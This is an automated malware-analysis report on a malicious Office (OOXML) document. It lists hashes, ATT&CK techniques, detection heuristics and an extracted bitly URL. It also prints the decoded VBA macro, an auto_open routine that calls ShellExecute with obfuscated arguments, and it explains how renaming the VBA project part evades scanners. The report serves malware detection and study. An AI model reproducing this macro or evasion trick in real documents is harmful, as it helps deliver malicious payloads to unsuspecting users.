Office (OOXML) malware analysis — malicious · b0f995341f95a231

MALICIOUS

Office (OOXML)

9.7 KB First seen: 2021-10-23

MD5: 6dacfa9d1d1ab643aabf5c828a80c1df SHA-1: 657d191714614568e917c2ba35c6996e78d6b484 SHA-256: b0f995341f95a2317c0e85d6489a9f93c2e16c54376d4b8fa4724f61a7f9493f

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing a renamed VBA project, indicating an attempt to evade detection. The presence of an Auto_Open macro and the use of `ShellExecute` within the VBA code strongly suggest that the macro is intended to download and execute a second-stage payload. The VBA code constructs the arguments for `ShellExecute` by calling methods on a `clean` object, which is likely obfuscation for the actual command or URL to be executed.

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/tsftfsygciuu.b)
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED

The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Attribute VB_Name = "clom"
Sub auto_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://www.bitly.com/jasdojasdokkaasasddksd In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	549 bytes
SHA-256: `f3d9997dd6e94a41b2f7c048dc8770036d0b64177f67ba91793c6ab6f322e802`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "clean" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "clom" Sub auto_open() Dim Total As New clean Dim NamakTotal, lora As String NamakTotal = Total.getEnumName(1) lora = Total.getEnumName(2) koko = lora Total. _ calc. _ ShellExecute NamakTotal, koko End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: ppt/tsftfsygciuu.b	26112 bytes
SHA-256: `d6c18cc439e36dca9e7595def562585c8623c3d0dde576b09704f350c24872f1`

Open this report in the interactive analyzer, or submit your own file for analysis.